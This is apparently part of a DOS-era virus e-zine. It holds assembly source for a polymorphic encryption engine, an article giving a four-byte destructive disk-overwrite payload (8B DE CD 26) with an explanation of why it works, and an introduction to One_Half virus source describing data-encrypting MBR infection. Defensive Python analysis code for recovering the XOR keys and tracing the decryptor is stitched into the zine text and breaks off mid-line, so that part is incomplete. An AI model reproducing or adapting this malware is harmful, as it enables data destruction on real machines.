call random_g_memmov [ __old_1 ], axadd ax , 4mov [ __engine ], axadd ax , 2mov [ __oldptr ], axadd ax , 2mov [ __ks ], axmov di , offset new_enablecall gen_enable

mov ax , b_dcall randomadd di , ax

mov [ m1], dimov ax ,[ b2]add [ m1], ax

call gen_enginepush cspop ds

Page 32: EZine - Asterix #1


mov ax , b_dcall randomadd di , ax

mov ax ,[ b2]mov [ disable__ ], diadd [ disable__ ], axcall gen_disableretn

decision : push axmov ax , 2call randompop axretn

random0 : call randommov ax , cs :[ rseed ]retn

init_random :pushapush ds

xor ax , axmov ds , axxor ax , ds :[ 046ch ]

xor ax , ds :[ 3456h ]xor ax , ds :[ 7354h ]pop dsmov word ptr [ rseed ], axmov ah, 2ahint 21hnopxor dx , ds :[ 046eh ]xor dx , ds :[ 8* 4+2]xor dx , ds :[ 2354h ]mov word ptr [ rseed +2], axpoparetn

random : push dspush cspop dsmov word ptr [ rtemp ], ax

push bx cx dxmov ax ,word ptr [ rseed ]mov bx ,word ptr [ rseed +2]

mov cx , axmov dx , 8405h

mul dxshl cx , 3add ch , cladd dx , cxadd dx , bx

shl bx , 2add dx , bxadd dh, blshl bx , 5add dh, bladd ax , 1

Page 33: EZine - Asterix #1


adc dx , 0mov word ptr [ rseed ], axmov word ptr [ rseed +2], dx

mov cx , dxmul word ptr [ rtemp ]

mov ax , cxmov cx , dx

mul word ptr [ rtemp ]xchg ax , dx

add dx , cxadc ax , 0pop dx cx bx ds

or ax , axretn

CSs equ 0EhDSs equ 1EhESs equ 06hSSs equ 16ht_mem equ 0t_const equ 1t_reg equ 2t_stack equ 3t_seg equ 4random_grow equ 3MK equ 0cccch

mc_const strucmcc_type db ?

db ?mcc_val dw ?mc_const ends

mc_memstrucmcm_type db ?mcm_seg db ?mcm_ofs dw ?mc_memendsGET_TAB: push dx

mov al ,[ si ]mov dl , 5mul dladd al ,[ si +4]shl ax , 2add ax , offset cross_tabcall axor ax , axpop dxretn

COMPILER:comp_l :

call GET_TABje co_badpush sicall axpop si

mov ax ,[ si +4]cmp al , t_regjne cllcmp ah,[ indy ]jne cll

Page 34: EZine - Asterix #1


dec [ lock_ind ]cll :

co_ok : add si , 8cmp byte ptr [ si ], 0ffhjne comp_lretn

co_bad : mov al , 90hstosbjmp co_ok

RECURSER: mov [ si ], axmov [ si +2], bxmov [ si +4], cxmov [ si +6], dxcall ROOPadd si , 8retn

ROOP: call GET_TABjz must_gomov ax , random_growcall randomjnz roop_end

must_go : mov ax ,[ si +4]mov [ si +8+4], axmov ax ,[ si +6]mov [ si +8+6], ax

ro_l : mov ax , 4call randommov [ si +4], alcmp al , t_regjne ro_lzcmp [ lock_reg ], 0je ro_l

ro_lz : cmp al , t_stackjne ro_lxcmp word ptr [ si ], t_reg +4* 256je ro_l

ro_lx : call GET_TABjz ro_lmov al ,[ si +4]cmp al , t_memje garbage_memcmp al , t_regje garbage_reg

garbage_ret : mov [ si +4], ax ; destinationmov [ si +6], bxmov [ si +8], axmov [ si +10], bxadd si , 8jmp ROOP

roop_end : retngarbage_reg : mov ah,[ use_reg ]

jmp garbage_retgarbage_mem :

call random_g_memmov bx ,[ __old_1 ]dec bxsub bx , axja gm_okadd bx , 9

Page 35: EZine - Asterix #1


jns garbage_memgm_ok: xchg ax , bx

mov ax , CSs* 256+t_memjmp garbage_ret

CROSS_TAB:mov ax , 0retnmov ax , 0retnmov ax , offset mem2regretnmov ax , offset mem2stackretnmov ax , offset mem2segretnmov ax , offset const2memretnmov ax , 0retnmov ax , offset const2regretnmov ax , 0retnmov ax , 0retnmov ax , offset reg2memretnmov ax , 0retnmov ax , offset reg2regretnmov ax , offset reg2stackretnmov ax , offset reg2segretnmov ax , offset stack2memretnmov ax , 0retnmov ax , offset stack2regretnmov ax , 0retnmov ax , offset stack2segretnmov ax , offset seg2memretnmov ax , 0retnmov ax , offset seg2regretnmov ax , offset seg2stackretnmov ax , 0retn

mem2reg: mov al ,[ si ] .mcm_segcall drop_prefixmov al , 8Bh ; mov reg16,[mem16]mov ah,[ si +4+1]

shl ah, 3

Page 36: EZine - Asterix #1


jmp orah

mem2stack : mov al ,[ si ] .mcm_segcall drop_prefixmov ax , 30ffh ; push [mem16]jmp orah

mem2seg:mov al ,[ si ] .mcm_segcall drop_prefixmov al , 08Eh ; mov seg,[mem16]mov ah,[ si +4+1]sub ah, 6jmp orah

const2mem : lodswlodsw ; add si,4

mov al ,[ si ] .mcm_segcall drop_prefixmov ax , 00c7hcall orahmov ax ,[ si - 4] .mcc_valcmp ax , MKjne cm_okmov [ ent__ ], dimov ax ,[ b2]add [ ent__ ], axmov ax ,[ __entry ]

cm_ok: stoswretn

const2reg : mov al ,[ si +4+1]cmp [ si ] .mcc_val , 0jne c2r2mov dl , 9mul dlxchg ah, alcall decisionjz c2r3or ax , 0c033h ; xor reg,regjmp c2rc

c2r3 :or ax , 0c02bh ; sub reg,regjmp c2rc

c2r2 :add al , 0B8h ; mov reg16,imm16stosbmov ax ,[ si ] .mcc_val

c2rc : stoswretn

reg2mem: lodswlodsw ; add si,4mov al ,[ si ] .mcm_segcall drop_prefixmov al , 89h ; mov [mem16],reg16mov ah,[ si - 4+1]

shl ah, 3

Page 37: EZine - Asterix #1


jmp orah

reg2reg : mov ah,[ si +4+1]cmp ah,[ si +1]je r2r_shl ah, 3or ah,[ si +1]or ah, 0c0hmov al , 8bhstosw

r2r_ : retn

reg2stack : mov al ,[ si +1]add al , 50h ; push reg16stosbretn

reg2seg :mov al , 08eh ; mov seg,reg16mov ah,[ si +4+1]

r2_c2 : add ah,[ si +1]add ah, 0c0h - 6stoswretn

stack2mem : lodswlodswmov al ,[ si ] .mcm_segcall drop_prefixmov ax , 008fh ; pop [mem16]jmp orah

stack2reg : mov al ,[ si +4+1]add al , 58h ; pop reg16stosbretn

stack2seg :mov al ,[ si +4+1]inc alstosbretn

seg2mem: lodswlodswmov al ,[ si ] .mcm_segcall drop_prefixmov al , 08ch ; mov seg,[mem16]mov ah,[ si +1- 4]sub ah, 6jmp orah

seg2reg :mov al , 08ch ; mov seg,reg16mov ah,[ si +1]add ah,[ si +4+1]add ah, 0c0h - 6stoswretn

seg2stack :mov al ,[ si +1]

Page 38: EZine - Asterix #1


stosbretn

drop_prefix:
        cmp al, DSs
        je dp_x
        add al, 20h
        stosb
dp_x:   retn

random_g_mem:
        mov ax, 248
        call random
        add ax, offset gb_mem
        retn

orah:   cmp [lock_ind], 1
        jnz ora1
        call decision
        jz ora2
ora1:   or ah, 6
        stosw
        mov ax, [si].mcm_ofs
        stosw
        retn
ora2:   or ah, [mind]
        stosw
        mov ax, [si].mcm_ofs
        sub ax, [ug]
        stosw
        retn

COMl macro s0, s1, s2, s3
        mov ax, &s0+&s1*100h
        mov bx, &s2+&s3*100h
endm

COMh macro d0, d1, d2, d3
        mov cx, &d0+&d1*100h
        mov dx, &d2+&d3*100h
        call recurser
endm

COMx macro s0, s1, s2, s3, d0, d1, d2, d3
        mov ax, &s0+&s1*100h
        mov bx, &s2+&s3*100h
        mov cx, &d0+&d1*100h
        mov dx, &d2+&d3*100h
        call recurser
endm

cx_size equ 4*3+1

get_random_reg:
        mov ax, 7
        call random
        test al, 4
        jz grr
        inc al
grr:    retn

gen_em: call get_random_reg
        mov [use_reg], al
gend:   call get_ind
        cmp al, [use_reg]
        je gend
        mov [indy], al
        call reg2adr
        or al, 80h
        mov [mind], al
        mov [lock_reg], 1
        mov [lock_ind], 2
        retn

gen_disable:
        call gen_em
        mov ax, offset disable_data
        call gen_c
        mov al, 0CFh
        stosb
        retn

gen_enable:
        call gen_em
        mov ax, offset enable_data
        call gen_c
        mov al, 0CFh
        stosb
        retn

gen_c:  cld
        push di
        mov si, offset buf2
sl:     call ax
sx:     mov byte ptr [si], 0ffh
        pop di
        mov si, offset buf2
        call compiler
        retn

enable_data:
        mov al, t_reg
        mov ah, [use_reg]
        COMh t_stack, 0, 0, 0
        mov al, t_reg
        mov ah, [indy]
        COMh t_stack, 0, 0, 0
        call random0
        xchg ax, bx
        mov al, t_const
        mov [ug], bx
        mov cl, t_reg
        mov ch, [indy]
        call recurser
        COMx t_seg, DSs, 0, 0, t_stack, 0, 0, 0
        COMx t_const, 0, 0, 0, t_seg, DSs, 0, 0
        COMl t_mem, DSs, 4, 0
        mov cx, t_mem+100h*CSs
        mov dx, [__old_1]
        call recurser
        COMl t_mem, DSs, 6, 0
        mov cx, t_mem+100h*CSs
        mov dx, [__old_1]
        inc dx
        inc dx
        call recurser
        mov ax, t_mem+256*CSs
        mov bx, [__engine]
        COMh t_mem, DSs, 4, 0
        COMx t_seg, CSs, 0, 0, t_mem, DSs, 6, 0
        COMx t_stack, 0, 0, 0, t_seg, DSs, 0, 0
        COMl t_stack, 0, 0, 0
        mov cl, t_reg
        mov ch, [indy]
        call recurser
        COMl t_stack, 0, 0, 0
        mov cl, t_reg
        mov ch, [use_reg]
        call recurser
aax:    mov ax, 1000h           ; 0..0fff OF DF IF TF SF ZF
        call random
        or ah, 3
        mov bx, ax
        mov al, t_const
        mov cl, t_stack
        dec [lock_reg]
        call recurser
        COMx t_seg, CSs, 0, 0, t_stack, 0, 0, 0
        mov al, t_const
        mov bx, MK
        COMh t_stack, 0, 0, 0
        retn

disable_data:
        mov al, t_reg
        mov ah, [use_reg]
        COMh t_stack, 0, 0, 0
        mov al, t_reg
        mov ah, [indy]
        COMh t_stack, 0, 0, 0
        call random0
        xchg ax, bx
        mov al, t_const
        mov [ug], bx
        mov cl, t_reg
        mov ch, [indy]
        call recurser
        COMx t_seg, DSs, 0, 0, t_stack, 0, 0, 0
        COMx t_const, 0, 0, 0, t_seg, DSs, 0, 0
        mov ax, t_mem+100h*CSs
        mov bx, [__old_1]
        COMh t_mem, DSs, 4, 0
        mov ax, t_mem+100h*CSs
        mov bx, [__old_1]
        inc bx
        inc bx
        COMh t_mem, DSs, 6, 0
        COMx t_stack, 0, 0, 0, t_seg, DSs, 0, 0
        COMl t_stack, 0, 0, 0
        mov cl, t_reg
        mov ch, [indy]
        call recurser
        COMl t_stack, 0, 0, 0
        mov cl, t_reg
        mov ch, [use_reg]
        call recurser
        retn

gen_engine:
        cld
        call gen01
        jmp pushq
mk1:    jmp gen02
mk6:    retn

get_ind:
        mov ax, 3
        call random
        jnz g1x
        sub al, 2
g1x:    add al, 5
        retn

gen01:  call get_ind
        mov [i0], al
g1a:    call get_ind
        cmp [i0], al
        je g1a
        mov [i1], al
        call get_ind
        mov [i2], al
        call decision
        mov [s0], al
        retn

pushq:  mov [sp1], sp
        mov dx, sp
        sub ah, ah
        cld
        mov si, offset i0
        mov cl, 100h-3
pq0:    lodsb
        or al, 50h
        call isin
        je pq6
        push ax
pq6:    inc cl
        jnz pq0
pq2:    mov al, [si]
        call seg_push
        add al, 6
        push ax
        mov bx, sp
        mov dx, [sp1]
        sub dx, bx
        call chaos
        mov si, [sp1]
pq3:    dec si
        dec si
        mov al, ss:[si]
        stosb
        cmp si, sp
        jne pq3
        jmp mk1

popq:
pq5:    pop ax
        inc al
        test al, 40h
        jz pq4
        add al, 7
pq4:    stosb
        cmp [sp1], sp
        jne pq5
        jmp mk2

gen02:  mov [sp2], sp
        xor si, si
        mov cl, 100h-4
        push si
        push si
g2a:    push si
        lodsw
        inc cl
        jnz g2a
        mov ax, 5
        call random
        add ax, 2
        xchg cx, ax
g2b:    mov ax, 7
        call random
        push ax
        dec cx
        jnz g2b
        mov bx, sp
        mov dx, [sp2]
        sub dx, bx
        call chaos

mk3:    mov si, offset buf2
        mov al, [i0]
        mov [use_reg], al
        mov ax, t_seg+100h*CSs
        mov cl, al
        mov ch, DSs
        call recurser
        mov ch, [i1]
        mov [use_reg], ch
        mov ch, [i0]
        mov cl, t_reg
        mov ax, t_reg+4*256
        call recurser
        mov ch, [i1]
        mov ax, t_mem+100h*CSs
        mov bx, [__oldptr]
        mov cl, t_reg
        call recurser
        mov byte ptr [si], 0ffh
        mov si, offset buf2
        call compiler
        mov [ec_new], di
        mov [neg00], 0
        mov al, [i1]
        call reg2adr
xx2:    mov [adr00], al
        mov al, [s0]
        mov [seg00], al
        mov si, sp
        mov [sp3], si
        cld
xx1:    lods word ptr ss:[si]
        mov [ofs00], al
        push word ptr [rseed]
        push word ptr [rseed+2]
        mov al, [i1]
xx3:    mov [reg00], al
        call gen00
        cmp si, [sp2]
        jne xx1
        mov [ecn_end], di
        mov al, [i0]
        call reg2adr
        mov ah, byte ptr [sp1]
        sub ah, byte ptr [sp2]
        xchg ax, bx
        call decision
        jz fuck_1
        mov ax, 08b36h
        stosw
        xchg ax, bx
        mov bl, [i2]
        shl bl, 3
        or al, 01000000b
        or al, bl
        stosw
        jmp short fuck_2
fuck_1: mov ax, 0ff36h
        stosw
        xchg ax, bx
        or al, 070h
        stosw
        mov ch, [i2]
        mov [use_reg], ch
        mov ax, t_stack
        mov cl, t_reg
        mov si, offset buf2
        call recurser
        mov byte ptr [si], 0ffh
        mov si, offset buf2
        call compiler
fuck_2: mov [dc_new], di
        mov [neg00], 1
        mov al, [i2]
        call reg2adr


xb2:    mov [adr00], al
        mov al, [s0]
        mov [seg00], al
        mov si, [sp2]
xb1:    dec si
        dec si
        mov ax, ss:[si]
        mov [ofs00], al
        pop word ptr [rseed+2]
        pop word ptr [rseed]
        mov al, [i2]
        mov [reg00], al
        call gen00
        cmp si, [sp3]
        jne xb1
        mov ax, [sp2]
        sub ax, sp
        add sp, ax
        mov [dcn_end], di
        mov ah, [i2]
        mov [use_reg], ah
        mov si, offset buf2
        mov cx, t_mem+100h*CSs
        mov dx, [__oldptr]
        mov al, t_reg
        call recurser
        mov byte ptr [si], 0ffh
        mov si, offset buf2
        call compiler
        jmp popq
mk2:    mov al, 0cfh
        stosb
        jmp mk6

gen00:  mov ax, 4
        call random
        or al, al
        jnz g0d
        mov al, 2eh
        jmp g0c
g0d:    mov al, [seg00]
        or al, al
        jnz g0e
        mov al, 26h
g0c:    stosb
g0e:    mov ax, tab00size*4
        call random
        and al, 0fch
        mov bx, ax
        add ax, offset tab00
        call ax
        mov dl, [neg00]
        test ah, dl
        jz g0h
        xor bl, 4
        mov ax, bx
        add ax, offset tab00
        call ax
g0h:    and ah, 0feh
        or ah, [adr00]
        cmp bl, offset trg00 - offset tab00
        jae g0g
        mov dl, [reg00]
        shl dl, 3
        or ah, dl
g0g:    cmp [ofs00], 0
        jne g0a
        and ah, 03fh
        stosw
        jmp g0f
g0a:    stosw
        mov al, [ofs00]
        stosb
g0f:    cmp bl, offset tim00 - offset tab00
        jb g0b
        call random0
        stosw
g0b:    retn

; each entry is "mov ax,imm16 / ret": calling it returns opcode and modrm template in AX
tab00:  db 0B8h, 001h, 01000001b, 0c3h    ; add ,reg
        db 0B8h, 029h, 01000001b, 0c3h    ; sub
        db 0B8h, 031h, 01000000b, 0c3h    ; xor

trg00:  db 0b8h, 0f7h, 01011000b, 0c3h    ; neg
        db 0b8h, 0ffh, 01000001b, 0c3h    ; inc
        db 0b8h, 0ffh, 01001001b, 0c3h    ; dec
        db 0b8h, 0d0h, 01000001b, 0c3h    ; rol ,1 - byte
        db 0b8h, 0d0h, 01001001b, 0c3h    ; ror ,1 - byte
        db 0b8h, 0f7h, 01010000b, 0c3h    ; not

tim00:  db 0b8h, 081h, 01110000b, 0c3h    ; xor
        db 0b8h, 081h, 01000001b, 0c3h    ; add ,immw
        db 0b8h, 081h, 01101001b, 0c3h    ; sub

tab00end label byte
tab00size equ (offset tab00end - offset tab00)/4

chaos:  pusha
        push ds
        push ss
        pop ds
        mov cx, dx
ch0:    mov ax, dx
        call random
        and al, 0feh
        mov si, ax
        mov ax, dx
        call random
        and al, 0feh
        mov di, ax
        mov ax, [si+bx]
        xchg ax, [di+bx]
        mov [si+bx], ax
        dec cx
        jnz ch0
        pop ds
        popa
        retn

isin:   pusha
        mov si, sp
        add si, 16+2
ii1:    cmp si, dx
        je ii2
        cmp ss:[si], ax
        je ii0
        inc si
        inc si
        jmp ii1
ii2:    inc si
ii0:    popa
        retn

seg_push:
        or al, al
        jz sp_xx
        mov al, 18h
sp_xx:  retn

reg2adr:
        sub al, 2
        cmp al, 1
        jne r2a
        mov al, 7
r2a:    retn

getlost_po:
        mov ax, [dcn_end]
        add ax, [b2]
        mov [dco_end], ax
        mov ax, [dc_new]
        add ax, [b2]
        mov [dc_old], ax
        mov si, [__old_1]
        mov [old1_ofs], si
        pop [si+2]
        pop [si]
        mov ax, [m1]
        mov [si+4], ax
        call gen_preint
onmt:   mov ax, 18h
        call random
        add al, 40h
        cmp al, 50h
        jb okaa
        add al, 40h
okaa:   mov byte ptr [start_v], al
        and al, 7
        cmp al, 4
        je onmt
        push cs
        pop es
        mov si, offset rcpt
        mov di, offset safe
        movsw
        movsb
        mov cx, [bitch]
        call fake_seg
        xor di, di
        xor si, si
        shr cx, 1
        rep movsw
        mov di, cs:[bitch]
        add di, decr_code
        mov cx, offset c_aft+1
        sub cx, di
        shr cx, 1
        rep movsw
        call fake_seg
        xor si, si
        mov di, offset c_aft
        mov cx, cs:[__old_1]
        sub cx, di
        rep movsb
        add di, gb_len
        mov cx, offset start_v
        sub cx, di
        rep movsb
        mov di, offset dil_heap
        mov cx, dil_len/2
        rep movsw
        call cr_randomize
        push cs
        pop ds
        retn

MORPH:  pusha
        mov di, sp
        mov cl, 0
        mov al, 0ffh
        db 'ENGINE OF ETERNAL ENCRYPTION'
        mov ax, di
        sub ax, sp
        add sp, ax
        popa
        call POWERUP
        push cs
        pop ds
        mov al, byte ptr [dis_val]
        mov byte ptr [rcpt], al

pre_prepare:
        call dil_gen
        mov si, [old1_ofs]
        push [si]
        push [si+2]
        push cs
        pop ds
        mov ax, sp
        shr ax, 4
        mov bx, ss
        add ax, bx
        add ax, ss_distance
        mov [empty_seg], ax
        mov si, [ecn_end]
        push [si]
        mov byte ptr [si], 0c3h
        xor ax, ax
        mov es, ax
        mov [sp_tmp], sp
        pusha
        pusha
        push TF
        push cs
        push offset start_v+1
        mov si, [dco_end]
        mov [oldptr_2], offset pred+1
        push offset prepare_re
        push 0
        push cs
        push offset rcpt
END_offset:
        iret
        nop

        db Maxinst dup (?)
endv:
heapbeg:

block_beg   dw offset block - offset start
block_len   dw 1

dc_old      dw offset dc_oldx
dco_end     dw offset dc_oldx

old1_ofs    dw offset old1
disable__   dw offset disable

old_ss      dw ?
old_sp      dw ?
old_ip      dw ?
old_cs      dw ?

ent__       dw offset ent_+1
bitch       dw 100h
dis_val:    retn

data_12e:

d_beg:
rcpt:
rcBUF       db 8+2 dup (?)
UMB_link    dw ?
UMB_strategy dw ?

old_21      dd ?
d_end:
dataend:
block:      retn

dil_len     equ 12aeh - 1199h + 1 + 4
getlost     label byte
prepare_re  equ getlost + 59h
reCRYPT     equ getlost + 69h
dil_heap    db dil_len dup (?)
ec_new      dw ?
dc_new      dw ?
ecn_end     dw ?
dcn_end     dw ?
temp_seg    dw ?
b2          dw ?                ; bitch II
safe        db 3 dup (?)

oldptr_2    dw ?
m1          dw ?
len_add     dw ?
new_enable  db decr_code dup (?)

sp_tmp      dw ?
time        dw ?
date        dw ?
buffer      db headerlen dup (?)
create      dw ?
empty_seg   dw ?
hook21      dw ?, ?

seg00       db ?
reg00       db ?
adr00       db ?
ofs00       db ?
neg00       db ?

i0          db ?
i1          db ?
i2          db ?
s0          db ?

sp1         dw ?
sp2         dw ?
sp3         dw ?

use_reg     db ?
indy        db ?
mind        db ?
ug          dw ?
lock_ind    db ?
lock_reg    db ?
temp        dw ?
buf2        db 400h dup (?)

__old_1     dw ?
__entry     dw ?
__engine    dw ?
__oldptr    dw ?
__ks        dw ?

rseed       dw ?, ?
rtemp       dw ?

heapend:
temp_buf:

end start


The Ultimate Solution
The world's smallest virus ever.

Editorial
So dudes, here is another kick-the-ass contribution to our zine: the smallest virus in the world. Enjoy it and don't get infected, so pay attention to your A: drive. Maybe you get the feeling the contribution is unreal, but remember, this is no AF edition....

So enjoy the article by Vyvojar.

Kyjacisko alias Budzogan

Halloa. The smallest virus ever comes. From Slovakia, of course. From Vyvojar, of course. It's so small it can spread orally: just tell your friend 8B DE CD 26 and there it is, replicated. Now the extra quick intro to writing a virus. All you need is two instructions. The first one is variable (polymorphism of the most fundamental level), so whether you write 8B DE or B7 01 doesn't matter that much, and the conversation gets more colorful. All you need to get across is to put the right value into the right register (the one and only BX). So, one half is done. Press any key to continue... The second instruction is, unfortunately, not polymorphic, but it works. It goes CD 26 and simply tells the machine to spread the virus. The virus is now replicated, hopefully. Extra bonus: it's stealth (a little bit), and heuristics don't stand a chance. Possibly it infects archives as well (ZIP, ARJ, RAR etc.)...

What history tells us. The first attempts to write a short virus date far back. Most of them are overwriting non-TSR things. There was a discussion on the virus-l list on the Internet and they concluded the smallest ever was some Trivial.22 chap (gosh, 500% bigger than Kyjacisko).

Note for non-Slovak residents: if you don't know what Kyjacisko (Budzogan respectively) means, consult the Slovak embassy near you. If you don't know who Vyvojar is, you are not supposed to read this mag anyway.


The serious part.
Requirements: works exclusively with MS-DOS, tested with 5.0+ (no Windows business, folks). Requires 4 bytes of free RAM (apart from the PSP and things like that). The first instruction sets the BX register to 100h. You can achieve this in several different ways, e.g. mov bx,si (alternative A, because DOS starts a .COM with SI = 100h) or mov bh,01 (alternative B, because BX starts out as 0) etc. The second instruction runs int 26h (absolute disk write). This interrupt needs several things. The following registers should be set like this:

AL contains the disk drive number (0 = A:).
DS:BX buffer to be written out (int 26h reads the buffer through DS; in a freshly started .COM, DS and ES both hold the PSP segment, so the value is the same either way).
CX number of sectors to be written.
DX starting logical sector number. That is all for today.

And now, let's see how Microsoft set the registers for us:
AL = 0 (mostly) ........................... documented
BX = AX = 0 (we set BX to 100h, remember?) . undocumented
CX = FFh .................................. undocumented
DX = DS = ES = PSP segment = base address .. partially documented
It should all be safe and clear now.

So the virus writes itself (or, in fact, 255 sectors of memory starting at PSP:100h) somewhere onto disk A:, where "somewhere" is the logical sector whose number equals the PSP segment value. If the starting sector number of a .COM or .EXE file is identical with the DX value, that file gets infected. Often people start panicking: "how will it all end, what a bunch of data will be lost, it isn't a 4-byte virus when it writes 255 sectors" etc. etc. The answer, my friend, is written in the empirical facts of other viruses as well as in the definition of a virus itself.

OK, I'm finished and so is the virus. The code you can get from any good BBS, by fax, or by a telephone call from a friend. It is also included in the supplement to this file.

The motto of the day.
"As Windows(TM) gets longer, good things get shorter."

Vyvojar

Download here


The only authentic One_Half source code.
Exclusively for the *-zine.

Editorial
You may remember the time of its outbreak. It was horrible, unknown and effective. It encrypted your data. It was One_Half. Still on the scene, still in the wild, still on the WildList. Here comes the source.

Disclaimer
The code presented below is one of the most successful viruses in history. It can (under some circumstances) destroy your data. If you compile it, it's on you what you do with the executable file. We don't care. Guilty of any damage is the asshole who executes it.

Dear friends,
some time has already passed since the great days of the One_Half epidemic. Nevertheless, we still hope that the code of this popular virus inspires you even now. A lot of stuff has been written on the subject, so I think not many words are necessary about this little creature any more. And so, here is the original source of One_Half.3577.

Vyvojar

OneHalf.3544
OneHalf, aka Slovak Bomber, aka Explosion II, is a multipartite, memory-resident COM and EXE infector. When an infected file is executed, OneHalf infects the MBR of the hard disk. The original contents of the MBR are stored on track 0, in the 8th sector counting from the last one; the MBR is altered and the viral body is placed in the last 7 sectors of track 0. OneHalf then looks for the last active DOS partition (or extended partition table), computes the first and last cylinder numbers of that partition (the zTosi, zactr and kontr code below works in cylinders, not sectors) and stores them at offset 29h in the MBR. From this moment on, on every system boot the virus decrements this variable by 2 and encrypts the 2 cylinders it points at, so the disk is encrypted very slowly, from the end of the partition towards its beginning. The encrypted areas are decrypted on demand by the int 13h hook, but only while the virus is memory resident: trying to remove it with a clean boot and FDISK /MBR is the surest way to lose your data, because the part of the disk that is already encrypted stays encrypted. I forgot to say that OneHalf is a stealth virus. OneHalf infects files on floppy disks and network drives, but not on the local hard drive, which is a very good and effective strategy for spreading. We were told the virus was, in the very beginning, planted on 3 computers in a university lab. And look, now it is spread worldwide.
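The on-demand encryption described above is a constant-key XOR over each sector: the zSkramb routine in the listing below XORs all 256 words of a 512-byte sector with one 16-bit key that is set once from the BIOS timer count. The following Python is an added analysis example, not code from the zine or from One_Half. It models that transform and shows the two recovery paths an incident responder has once the resident virus is gone: a known-plaintext check against any sector whose clean copy exists (for instance the original boot sector the virus saved on track 0), and a probable-plaintext vote that exploits the zero fill found in most partially used data sectors. The sample sector, the key 0x1234 and the function names are constructed for the example.

```python
from collections import Counter
import struct

SECTOR_BYTES = 512


def scramble_sector(sector: bytes, key: int) -> bytes:
    """XOR every little-endian 16-bit word of one sector with the same key.
    This is the shape of the zSkramb loop (256 words, one constant key), so
    applying it a second time restores the sector: encrypt == decrypt."""
    if len(sector) != SECTOR_BYTES:
        raise ValueError("expected exactly one 512-byte sector")
    words = struct.unpack("<256H", sector)
    return struct.pack("<256H", *[w ^ (key & 0xFFFF) for w in words])


def recover_key_from_known(cipher: bytes, plain: bytes) -> int:
    """Known plaintext: with a constant key, cipher_word ^ plain_word is the
    key for every word.  Refuse if the words disagree, because that means the
    sector was not transformed the way we assume (or not with a single key)."""
    keys = {c ^ p for c, p in zip(struct.unpack("<256H", cipher),
                                  struct.unpack("<256H", plain))}
    if len(keys) != 1:
        raise ValueError(f"inconsistent key candidates: {len(keys)}")
    return keys.pop()


def recover_key_from_fill(cipher: bytes, fill_word: int = 0x0000) -> tuple[int, float]:
    """Probable plaintext: a sparsely used sector is mostly fill words, so the
    most frequent ciphertext word is almost surely fill_word ^ key.  Returns
    the key and the fraction of words that voted for it; report that
    confidence before rewriting anything on a real disk image."""
    words = struct.unpack("<256H", cipher)
    (top, votes), = Counter(words).most_common(1)
    return top ^ fill_word, votes / len(words)


def looks_scrambled(sector: bytes, key: int, threshold: float = 0.5) -> bool:
    """Heuristic for locating the boundary between the untouched front of the
    disk and the encrypted tail: a mostly-fill sector reads as mostly `key`
    once it has been scrambled."""
    words = struct.unpack("<256H", sector)
    return words.count(key & 0xFFFF) / len(words) >= threshold


def make_sample_sector() -> bytes:
    """Constructed sample, not data from a real disk: a short record followed
    by zero fill, the typical shape of a partially used data sector."""
    record = b"ONE_HALF TXT" + bytes(range(1, 21)) + b"\x55\xaa"
    return record + bytes(SECTOR_BYTES - len(record))
```

The fill-word vote needs no clean copy at all, which is what makes it usable after a FDISK /MBR has already discarded the virus and its counter; the known-plaintext path is the one to trust when a saved original sector is available, and its consistency check is what tells you whether the sector really was scrambled with a single key.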


In an infected file, the virus decryptor is divided into 10 parts which are spread across the whole infected file. The parts are connected by 2 types of jumps (short and near) and, of course, there are garbage instructions in between, randomly chosen from a small table of one-byte instructions (the randi table in the source below holds 9 of them).
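As an added analysis example (not code from the zine or from One_Half), the script below shows how a scanner can reassemble that split decryptor statically. It walks the jump chain from the entry point, skips the one-byte junk the randi table in the source can emit (nop, stc, clc, sti, cs:, ds:, cld, std, cmc), follows EB/E9 jumps, collects the ten template instructions in execution order, reads the start, key, key increment and end out of them, and runs the same rolling XOR the template encodes (xor word [p],key; key += delta; p += 1) to decode the payload. The host image, its layout and the choice of di/dx as address and data registers are constructed for the example, and addresses are taken to equal offsets into the flat buffer.

```python
import struct

# One-byte junk the randi table can insert between real instructions:
# nop, stc, clc, sti, cs:, ds:, cld, std, cmc.
JUNK = {0x90, 0xF9, 0xF8, 0xFB, 0x2E, 0x3E, 0xFC, 0xFD, 0xF5}


def insn_len(buf: bytes, off: int) -> int:
    """Length of the 8086 encodings the decryptor template can produce."""
    op = buf[off]
    if op in (0x0E, 0x1F) or 0x40 <= op <= 0x47 or 0x50 <= op <= 0x57:
        return 1                                   # push cs / pop ds / inc r16 / push r16
    if 0xB8 <= op <= 0xBF or op == 0xE9:
        return 3                                   # mov r16,imm16 / jmp near rel16
    if op in (0x31, 0x81):                         # xor [reg],r16 / add|cmp r16,imm16
        modrm = buf[off + 1]
        if op == 0x31 and modrm >> 6 == 0 and modrm & 7 != 6:
            return 2
        if op == 0x81 and modrm >> 6 == 3:
            return 4
        raise ValueError(f"unsupported modrm {modrm:02x} at {off:#x}")
    if 0x70 <= op <= 0x7F or op == 0xEB:
        return 2                                   # jcc rel8 / jmp short rel8
    raise ValueError(f"unexpected opcode {op:02x} at {off:#x}")


def trace_decryptor(buf: bytes, entry: int, limit: int = 256) -> list[tuple[int, bytes]]:
    """Walk from entry: drop junk, follow jmp short/near, keep real
    instructions, stop at the jcc that closes the decryption loop."""
    found, off = [], entry
    for _ in range(limit):
        op = buf[off]
        if op in JUNK:
            off += 1
            continue
        n = insn_len(buf, off)
        if op == 0xEB:
            off += 2 + struct.unpack_from("<b", buf, off + 1)[0]
            continue
        if op == 0xE9:
            off += 3 + struct.unpack_from("<h", buf, off + 1)[0]
            continue
        found.append((off, bytes(buf[off:off + n])))
        if 0x70 <= op <= 0x7F:
            return found
        off += n
    raise RuntimeError("loop-closing jcc not found within limit")


def loop_params(insns: list[tuple[int, bytes]]) -> dict:
    """Read start/key/delta/end back out of the collected instructions.  The
    registers are whatever the mutation picked: add (81 /0) names the data
    register and cmp (81 /7) names the address register."""
    movs, p = {}, {}
    for _, b in insns:
        if 0xB8 <= b[0] <= 0xBF:                   # mov r16,imm16
            movs[b[0] & 7] = struct.unpack("<H", b[1:3])[0]
        elif b[0] == 0x81:
            ext, reg = (b[1] >> 3) & 7, b[1] & 7
            imm = struct.unpack("<H", b[2:4])[0]
            if ext == 0:
                p["delta"], p["data_reg"] = imm, reg
            elif ext == 7:
                p["end"], p["addr_reg"] = imm, reg
    p["key"], p["start"] = movs[p["data_reg"]], movs[p["addr_reg"]]
    return p


def xor_rolling(buf: bytearray, start: int, end: int, key: int, delta: int) -> None:
    """xor word [p],key; key += delta; p += 1 until p == end.  Word writes
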